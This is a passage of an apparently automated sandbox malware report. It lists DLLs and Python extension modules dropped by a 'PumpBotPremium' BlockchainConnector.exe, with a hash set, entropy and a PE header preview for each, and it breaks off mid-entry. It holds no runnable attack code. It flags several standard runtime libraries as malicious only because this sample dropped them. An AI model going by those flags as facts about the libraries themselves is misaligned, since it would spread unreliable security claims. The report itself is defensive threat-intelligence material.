SSDEEP:	3072:u6EkeGFXP0xgNJOhXVBvFL2N+GuH+60DEdEDb3PC5:vFZKgNJCXVB9CN+GueRb
MD5:	7F3FC8798659A90B5654441DFDD7BA66
SHA1:	F760A2813FDC608D45054E77C6A4E54C9DF3921A
SHA-256:	002F8AD96921B458DED42F447BD75CC5D0FA4925F81E4B86FFECFC2C095DB2D1
SHA-512:	186A8DD1DD2981A72D55E5D882358F77B75C8B32E9D6499407B0486E7CC8C4C2F05134BBD06391FD6C2B831945C364614D4AD7230AE4A5B32CBFCBEFB98EC42E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VL.U.-...-...-...US..-..@X...-..._...-..@X...-..@X...-..@X...-...X...-...-...-...X...-...X...-...X?..-...X...-..Rich.-..........PE..d...hG.a.........." .....@..........P.....................................................`......................................... r..`....r..d...............................l....^..............................0^..8............P...............................text....>.......@.................. ..`.rdata...7...P...8...D..............@..@.data....N.......<...\|..............@....pdata..............................@..@.rsrc...............................@..@.reloc..l...........................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	691200
Entropy (8bit):	6.318647704262624
Encrypted:	false
SSDEEP:	12288:y5k6TpXHZlJw/MrkjwyWt7AbKuDYVS0gAlQl:h6TH/w/0wjWGZDYV7Rc
MD5:	EB35B6FAED5F36DADB93FBCFBDEA3AB0
SHA1:	092CC95E7B748051AA37896F8185D46A11AD0E8D
SHA-256:	886BAC3BB98575F25A262CFFB980AD40BB3E883BCDABA6C3B0ACD83D6B3611A2
SHA-512:	B2427A88EDCF1F1C1CCF8DF54D0ED1C2A7845522B6D67B7F464ABBCCA66B253B91D2A2D98185318FC27A5A2DF134A49FA7636062EB0E04B5F52853135CBD653F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...n...n...n...g.d.f...<...l......l...<...b...<...f...<...m......m...n...G......h......o......o......o......o...Richn...........................PE..d...vG.a.........." ................0.....................................................`......................................... ............................%..................pO...............................O..8............................................text...X........................... ..`.rdata..............................@..@.data...8...........................@....pdata...%.......&...X..............@..@.rsrc................~..............@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	80896
Entropy (8bit):	6.130772967610917
Encrypted:	false
SSDEEP:	1536:nj+Cg5rYe1epxMWU682IEQCdR0M8LD4WPgmd0WXmkYt:niCYWU68HEQCdR0zLDEWXmrt
MD5:	9D08FC252C9CE559441D701EAF526D34
SHA1:	036C81BD6666C27747B40CF0089679CC33FC4637
SHA-256:	67D6946B0A7E169A2162AC7125F190A469E04AB2DE9EF090691B56C47AB0F759
SHA-512:	E910835F2BDD14B97F9FCAF15465D542FB4F6F7D50DD6A21EDFEB10021933D76F8DCE0CA30E7DEAA7E8657F922BDB34AE970F835259577B0972CF020DD050945
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@...........G.......................................c.........y...`......`......`.+....`......Rich...................PE..d...aG.a.........." ................P.....................................................`.............................................`...P...x....`.......P...............p......................................0...8............................................text............................... ..`.rdata...4.......6..................@..@.data....<.......4..................@....pdata.......P......................@..@.rsrc........`.......8..............@..@.reloc.......p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.0603400459676875
Encrypted:	false
SSDEEP:	1536:nj83tVmc8rZqTNYYZyynkEy9WDQ3sPvFEiQ6iyMAdZ7:nC8INYTynkEywDQ3sPvHMAdZ
MD5:	8FDBFEA1BE36BC2A62F63274BA84AC2A
SHA1:	1914F50790D8C98E905FCA691C65B8BBA0C9785F
SHA-256:	0A90FBFEB66D461C925C7E9DCD75142B27DEE24F9CE61C30079FC588E3CB626D
SHA-512:	742F56224D507E311ADA3939CE5D016DEDFD25A481DED30F77B8A31972674F7EC129DB2B40429C34CBAC843E81130AFC14927D24F34884F480502B80B1999B3C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y.[.8...8...8...@R..8...M...8..UJ...8...M...8...M...8...M...8..?M...8...8...8..<M...8..<M...8..<M>..8..<M...8..Rich.8..........................PE..d...cG.a.........." ................P.....................................................`.............................................\...\...d....p.......`..................l.......................................8...............p............................text............................... ..`.rdata...).......*..................@..@.data....O.......F..................@....pdata.......`.......B..............@..@.rsrc........p.......L..............@..@.reloc..l............N..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	72192
Entropy (8bit):	5.974448947930513
Encrypted:	false
SSDEEP:	1536:G/FMGSHHD8gUrNC4X3FEUtDKh9gNjsPAxrjU:GtgHD8gmC4HGUtDKh9gNjs0rjU
MD5:	136551C7D57CB96CD5DE2C7B934F0E13
SHA1:	65D1947F46300C11E8642C7B0F4BEF7D5392672D
SHA-256:	5F36DCC4D8B877096BF4A4CF575E05860A3EC989CA177DFC5074DB6CFB03E5AB
SHA-512:	05CBD293C7C1FEE84FFD678D718DDCFAC09BEB0F1EE3929180F7C20E66DFEB02BC2204E5520308F310568136118BB4909BFDAF55946F7D952AA68F879E60B537
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.[.X...X...X... R..X...-...X..U...X...-...X...-...X...-...X..?-...X...X...X..<-...X..<-...X..<->..X..<-...X..Rich.X..........PE..d...bG.a.........." .........z......P........................................p............`.........................................`...`.......d....P.......@..@............`..P...P...............................p...8............................................text............................... ..`.rdata...(.........................@..@.data....@.......8..................@....pdata..@....@......................@..@.rsrc........P......................@..@.reloc..P....`......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53760
Entropy (8bit):	5.836906684414675
Encrypted:	false
SSDEEP:	768:dIUsjZzN+MciuBM0LwTYuMC9rZ3HNe/SfbB2AbTDxGnBLlprTalKhOuy:mpzoMciackuMCn3QHmTDxGnBLrullu
MD5:	6775E31A5A5ABD60557FA83C61618027
SHA1:	56CBB56F9CEEB6CDC1FE98F77042262AF0AE3F7A
SHA-256:	3F6DB2ED3F219102B43F6CF551746173E222C8A358C1F34F79744A88DF649D8B
SHA-512:	FDF2FE4A50DE191F0B60DBE218B8522194EAF2BAD2999E87B7EB0E9CF9C071A24D6FAA4DB87936322756E867B5395CD60381711C85FBC9933422B1F310DFF158
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.[.............`R......m......uj.......m.......m.......m.......m..........3....m.......m.......m>......m......Rich............................PE..d...dG.a.........." .....\|...\......P........................................ ............`.............................................\......d...................................x...................................8...............(............................text....{.......\|.................. ..`.rdata..r$.......&..................@..@.data...`(....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158720
Entropy (8bit):	6.107673785230663
Encrypted:	false
SSDEEP:	3072:5KEsc6dBd+3Y0vVS+y6mX8o+SeRUWDH2+Warahk4hCqtnSk2+WarahISVoyd:nsbGY0d7oTeRP2+WarahkytnSk2+WarQ
MD5:	2559E08C77FF5C62BF2EA4419E1B950B
SHA1:	EDD5BC2DB3B38289279883F78DD88B932438DF97
SHA-256:	1DB30CADCF34DCC8D29445833798606ABC01BDD202F040E5DE179D044FA03E03
SHA-512:	0A8D4C4E90F9FAB27BB2823DCEC89A6150A915D81F3E7AC182AE4CB32756D5B55B33203F0D2B4106F85ECB92A79CF701D3C88E872A640FF8C1E1B507F018891C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VL.Y.-...-...-...U#..-..@X...-..._...-..@X...-..@X...-..@X...-...X...-...-...-...X...-...X...-...XO..-...X...-..Rich.-..........PE..d...mG.a.........." ................P.....................................................`......................................... ...l.......d...............T...............0...P...............................p...8............................................text...h........................... ..`.rdata...M.......N..................@..@.data............x..................@....pdata..T............T..............@..@.rsrc................d..............@..@.reloc..0............f..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	587264
Entropy (8bit):	6.221564766509188
Encrypted:	false
SSDEEP:	6144:6ExmUW6CupofxPeQVx1TvXao45RZR+4dS1SCxSqwFSeWkSOKTSxSZSxeSjSWS5Sj:sh6FofJekx1T/RDIT7mmuV/TPOEzQ
MD5:	9CD2E04304081B32CEB824E0989B5D07
SHA1:	EAA0E895B22C7BEE9D0B02EC632E58F5B7CB4395
SHA-256:	017B95F8966ABFDE2CE50D1AC6B1527915C081BFB41C01E1C045549FDD313F5A
SHA-512:	3A31DECF9ADC6C503DBC3DD0B765794B64DDF82035E436C42217959956F06F04BE4301ADA982EEC04727720F3D08CEF5105236F5B419CE7C17A816AAA5274063
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........FN...N...N...G.F.J.......L.......L.......B.......F.......M.......M...N...........O.......M.......O.....*.O.......O...RichN...................PE..d....G.a.........." .................-.......................................P............`.........................................0(......80..x....0.......................@..p.......................................8............................................text...8........................... ..`.rdata..\...........................@..@.data...(....P.......6..............@....pdata..............................@..@.rsrc........0......................@..@.reloc..p....@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67072
Entropy (8bit):	5.906140071654569
Encrypted:	false
SSDEEP:	1536:PwseNxkc7Xva0Y420G1UD+dS4LBeLmRy:Pskcbi0Y42bUD+dS4VeiRy
MD5:	2C62184E46ECC1641B8E09690F820405
SHA1:	953DB2789D5EEAB981558388A727BD4D42364DD6
SHA-256:	43E09408673687A787415912336AC13FCCA9A7D7945B73D0C84AC4BB071E9106
SHA-512:	2DF440A9BF87345A5A0727CF4AE68592B32324A3A4D4611D047FBCA7984A9B8E55487D89E83E80DF8E0580C2A1DB26DB9722DBF18D4B2C8FD2770A55309E573E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ZT...5...5...5...M...5..L@...5..L@...5..L@...5..L@...5...k...5..UM...5...5...5...@...5...@...5...@`..5...@...5..Rich.5..........................PE..d....v*e.........." .........h..............................................@............`.........................................P...`.......@.... .......................0..(.......................................8............................................text............................... ..`.rdata..\|I.......J..................@..@.data...x...........................@....pdata..............................@..@.rsrc........ ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	191720
Entropy (8bit):	6.322506643675763
Encrypted:	false
SSDEEP:	3072:gUV1H8tt/Z6dhxQMOJzr9JuB9OVqjxCXRTWiTayyXsflyOCiXOgeDpSRP4kFIABQ:BVGtkdhAr9JuB0VTTV9yXsfo+o
MD5:	983D8E003E772E9C078FAAD820D14436
SHA1:	1C90AD33DC4FECBDEB21F35CA748AA0094601C07
SHA-256:	E2146BED9720EB94388532551444F434D3195310FA7BD117253E7DF81A8E187E
SHA-512:	E7F0FD841C41F313C1782331C0F0AA35E1D8BA42475D502D08C3598A3AAEFD400179C19613941CDFAD724ECA067DD1B2F4C2F1E8A1D6F70EEB29F7B2213E6500
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Qe.....J...J...J.\|:J...JGq.K...JGq.K...JGq.K...JGq.K...J.q.K...J.o.K...J...Jm..J.q.K...J.q.K...J.qVJ...J.q.K...JRich...J........................PE..d....O[a.........." ................p...............................................\E....`.........................................@...P............................................4..T...........................P5..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	61680
Entropy (8bit):	5.923759574558729
Encrypted:	false
SSDEEP:	768:ek8LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqe:ekwewnvtjnsfwGFIAB0hy
MD5:	A5471F05FD616B0F8E582211EA470A15
SHA1:	CB5F8BF048DC4FC58F80BDFD2E04570DBEF4730E
SHA-256:	8D5E09791B8B251676E16BDD66A7118D88B10B66AD80A87D5897FADBEFB91790
SHA-512:	E87D06778201615B129DCF4E8B4059399128276EB87102B5C3A64B6E92714F6B0D5BDE5DF4413CC1B66D33A77D7A3912EAA1035F73565DBFD62280D09D46ABFF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............d...d...d.\|.l...d.\|.d...d.\|.....d.\|.f...d.Rich..d.........................PE..d...\|O[a.........." .....................................................................`.........................................`...`...............................................T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python310.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4450544
Entropy (8bit):	6.458222828027988
Encrypted:	false
SSDEEP:	49152:+RYsIZfypUacEN7z1NR6JYL911cdl40pPQKE30tBuQS6BqL902zJAysI6maHmbM9:YYsI5xKZ4JxsvAI6xHEMb5Hs9d
MD5:	384349987B60775D6FC3A6D202C3E1BD
SHA1:	701CB80C55F859AD4A31C53AA744A00D61E467E5
SHA-256:	F281C2E252ED59DD96726DBB2DE529A2B07B818E9CC3799D1FFA9883E3028ED8
SHA-512:	6BF3EF9F08F4FC07461B6EA8D9822568AD0A0F211E471B990F62C6713ADB7B6BE28B90F206A4EC0673B92BAE99597D1C7785381E486F6091265C7DF85FF0F9B5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................~..........................................3...F..3......3.\|....3......Rich...........PE..d...pO[a.........." .....X#..d!.....,.........................................E......D...`...........................................<......z=.\|....pD......@B.0.....C.......D..t..x.$.T.............................$.8............p#.8............................text...bW#......X#................. ..`.rdata...-...p#......\#.............@..@.data.........=.......=.............@....pdata..0....@B......6A.............@..@PyRuntim`....`D......HC.............@....rsrc........pD......LC.............@..@.reloc...t....D..v...VC.............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	669184
Entropy (8bit):	6.03765159448253
Encrypted:	false
SSDEEP:	6144:zxxMpraRSS9Y68EuBPjIQN5cJzS7bUxgyPxFMH0PIXY3dVVVVAuLpdorrcK/CXjW:zxxMZMX1bQIJO7bazPEQSYNBLpdwNu
MD5:	65DD753F51CD492211986E7B700983EF
SHA1:	F5B469EC29A4BE76BC479B2219202F7D25A261E2
SHA-256:	C3B33BA6C4F646151AED4172562309D9F44A83858DDFD84B2D894A8B7DA72B1E
SHA-512:	8BD505E504110E40FA4973FEFF2FAE17EDC310A1CE1DC78B6AF7972EFDD93348087E6F16296BFD57ABFDBBE49AF769178F063BB0AA1DEE661C08659F47A6216D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..x...+...+...+..P+...+T.....+T.....+T.....+T.....+.....+......+......+......+...+U..+..W..+.....+..*...+Rich...+................PE..d...k..d.........." ................4.....................................................`..........................................U...c..............l....@...z............... ......T...........................0...8............................................text...#........................... ..`.rdata...$.......&..................@..@.data....I..........................@....pdata...z...@...\|..................@..@.rsrc...l...........................@..@.reloc... ......."..................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pywintypes310.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	134656
Entropy (8bit):	5.992653928086484
Encrypted:	false
SSDEEP:	3072:DLVxziezwPZSMaAXpuuwNNDY/r06trfSsSYOejKVJBtGdI8hvnMu:HfziezwMMaAX2Y/rxjbOejKDBtG681n
MD5:	CEB06A956B276CEA73098D145FA64712
SHA1:	6F0BA21F0325ACC7CF6BF9F099D9A86470A786BF
SHA-256:	C8EC6429D243AEF1F78969863BE23D59273FA6303760A173AB36AB71D5676005
SHA-512:	05BAB4A293E4C7EFA85FA2491C32F299AFD46FDB079DCB7EE2CC4C31024E01286DAAF4AEAD5082FC1FD0D4169B2D1BE589D1670FCF875B06C6F15F634E0C6F34
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9.$.X.w.X.w.X.w. [w.X.w.-.v.X.w.75w.X.w.-.v.X.w.-.v.X.w.-.v.X.w.3.v.X.wJ1.v.X.w.3.v.X.w.X.w.X.w,-.v.X.w,-.v.X.w,-.v.X.wRich.X.w........................PE..d......d.........." .........................................................P............`......................................... u..dB......,....0..l.......L............@..0...`Q..T............................Q..8............................................text............................... ..`.rdata..R...........................@..@.data....-.......(..................@....pdata..L...........................@..@.rsrc...l....0......................@..@.reloc..0....@......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6023664
Entropy (8bit):	6.768988071491288
Encrypted:	false
SSDEEP:	98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
MD5:	817520432A42EFA345B2D97F5C24510E
SHA1:	FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
SHA-256:	8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
SHA-512:	8673B26EC5421FCE8E23ADF720DE5690673BB4CE6116CB44EBCC61BBBEF12C0AD286DFD675EDBED5D8D000EFD7609C81AAE4533180CF4EC9CD5316E7028F7441
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D.............................UJ......................................................W.....,..................r....................Rich............PE..d...;._.........." ..........-.......-......................................`\.....x.\...`...........................................L..O....T...... \.......U.. ....[......0\..%..,.H.T.....................H.(.....H.0............./.H............................text............................... ..`.rdata..F7%.../..8%.................@..@.data...x....PT..\...6T.............@....pdata... ....U.."....T.............@..@.qtmimed.....0W.......V.............@..P.rsrc........ \.......[.............@..@.reloc...%...0\..&....[.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7008240
Entropy (8bit):	6.674290383197779
Encrypted:	false
SSDEEP:	49152:9VPhJZWVvpg+za3cFlc61j2VjBW77I4iNlmLPycNRncuUx24LLsXZFC6FOCfDt2/:BJZzI1ZR3U9Cxc22aDACInVc4Z
MD5:	47307A1E2E9987AB422F09771D590FF1
SHA1:	0DFC3A947E56C749A75F921F4A850A3DCBF04248
SHA-256:	5E7D2D41B8B92A880E83B8CC0CA173F5DA61218604186196787EE1600956BE1E
SHA-512:	21B1C133334C7CA7BBBE4F00A689C580FF80005749DA1AA453CCEB293F1AD99F459CA954F54E93B249D406AEA038AD3D44D667899B73014F884AFDBD9C461C14
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......QH^~.)0-.)0-.)0-.Q.-.)0-...-.)0-.F4,.)0-.F3,.)0-.F5,.)0-.F1,.)0-.Y1,.)0-.B5,.)0-.B1,.)0-.)1-m,0-.Y4,.)0-.Y5,\|(0-.Y0,.)0-.Y.-.)0-.).-.)0-.Y2,.)0-Rich.)0-................PE..d....._.........." ......?...+.....X.?.......................................k.....R.k...`.........................................pKK.....d.e.\|....`k.......g.......j......pk..6....F.T................... .F.(.....F.0.............?.p+...........................text...2.?.......?................. ..`.rdata...z&...?..\|&...?.............@..@.data....o... f.......f.............@....pdata........g.......f.............@..@.rsrc........`k.......j.............@..@.reloc...6...pk..8....j.............@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5498352
Entropy (8bit):	6.619117060971844
Encrypted:	false
SSDEEP:	49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
MD5:	4CD1F8FDCD617932DB131C3688845EA8
SHA1:	B090ED884B07D2D98747141AEFD25590B8B254F9
SHA-256:	3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
SHA-512:	7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25840
Entropy (8bit):	6.184647213244152
Encrypted:	false
SSDEEP:	384:XPjk/7e12hwheCZHqh1BeshphFIAmGcDG4y8JAgwhp:fUC2hwh9Hq3rHhFIAmGcDG4yMwh
MD5:	78D421A4E6B06B5561C45B9A5C6F86B1
SHA1:	C70747D3F2D26A92A0FE0B353F1D1D01693929AC
SHA-256:	F1694CE82DA997FAA89A9D22D469BFC94ABB0F2063A69EC9B953BC085C2CB823
SHA-512:	83E02963C9726A40CD4608B69B4CDF697E41C9EEDFB2D48F3C02C91500E212E7E0AB03E6B3F70F42E16E734E572593F27B016B901C8AA75F674B6E0FBB735012
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f ...N...N...N.......N..rO...N..rK...N..rJ...N..rM...N..rO...N..lO...N...O...N..rC...N..rN...N..r....N..rL...N.Rich..N.........................PE..d....O[a.........." .........2.......................................................y....`..........................................@..L....@..x....p.......`.......H..........H....2..T............................2..8............0...............................text............................... ..`.rdata..6....0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..H............F..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\sqlite3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1465072
Entropy (8bit):	6.573395442335468
Encrypted:	false
SSDEEP:	24576:kPrlPOhOZxO9hhvpPfRMtmJXRqGedEexiBgvLSHEpkz6FIVaPe+:k5POhOZxO9hhv15rJhqGegyLhpFIc
MD5:	7BB1D577405F1129FAF3EA0225C9D083
SHA1:	60472DE4B1C7A12468D79994D6D0D684C91091EF
SHA-256:	831BA87CB1A91D4581F0ABBCC4966C6F4B332536F70CF481F609C44CC3D987C2
SHA-512:	33B1FD3A289193BFF168C967CAEBC0131732BD04562A770CF2EDAC602AB6D958F7BDE7A0E57BB125A7598852BDAC30F96D0DB46CB4A2460A61A0D914B011ED20
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v..f.@.f.@.f.@...@.f.@...A.f.@...A.f.@...A.f.@...A.f.@...A.f.@.f.@nf.@^..A.f.@^..A.f.@^..@.f.@^..A.f.@Rich.f.@........PE..d....O[a.........." .....l...........q.......................................p.......M....`.............................................D!...$.......P...............>.......`......@...T...............................8...............(............................text....k.......l.................. ..`.rdata..d............p..............@..@.data....?...@...6...$..............@....pdata...............Z..............@..@.rsrc........P.......&..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tcl86t.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1855672
Entropy (8bit):	6.510910358547494
Encrypted:	false
SSDEEP:	24576:Lldauo6HQOZaWxCAnNDyY1vFsrOlwtJ6i/eFrrklM8Rc50mWszkwjLYfMiHrrTeC:Lld9QVyFrcM8RcxkwfGMiLrTzrSI
MD5:	AD03D1E9F0121330694415F901AF8F49
SHA1:	AD8D3EEE5274FEF8BB300E2D1F4A11E27D3940DF
SHA-256:	224476BEDBCF121C69137F1DF4DD025AE81769B2F7651BD3788A870A842CFBF9
